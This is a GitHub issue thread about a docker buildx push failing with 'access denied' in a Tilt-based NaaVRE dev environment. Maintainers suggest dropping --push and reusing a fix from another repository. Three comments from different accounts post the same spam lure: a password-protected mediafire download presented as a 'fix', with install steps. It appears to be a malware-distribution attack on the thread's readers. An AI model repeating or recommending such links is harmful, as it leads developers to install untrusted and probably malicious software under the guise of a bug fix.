### ISSUE TITLE
ERROR: denied: requested access to the resource is denied

### ISSUE THREAD

**Issue by skoulouzis** [QCDIS/NaaVRE-dev-environment#25]
vrepaas-vreapi and vrepaas-vreapp cannot start:
```
#16 ERROR: denied: requested access to the resource is denied
------
 > pushing qcdis/vreapi:tilt-build-1724694901 with docker:
------
ERROR: denied: requested access to the resource is denied

Build Failed: Custom build "docker buildx build ./submodules/VREPaaS -f ./submodules/VREPaaS/tilt/vreapis/Dockerfile -t $EXPECTED_REF --push" failed: exit status 1
```

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by skoulouzis** [comment]
Look at services/naavre/image.Tiltfile: 
```
docker buildx build ./submodules/NaaVRE -f ./submodules/NaaVRE/docker/vanilla/dev.Dockerfile -t $EXPECTED_REF -t qcdis/n-a-a-vre-dev:latest --push
```

Try and remove --push

**Comment by gpelouze** [comment]
We need to make the dev environment work on both local and remote minikube clusters

**Comment by gpelouze** [comment]
We should use the same fix as https://github.com/NaaVRE/NaaVRE-dev-integration/commit/e7ea80072136d4a27e83882fe69be3a1ec60969b
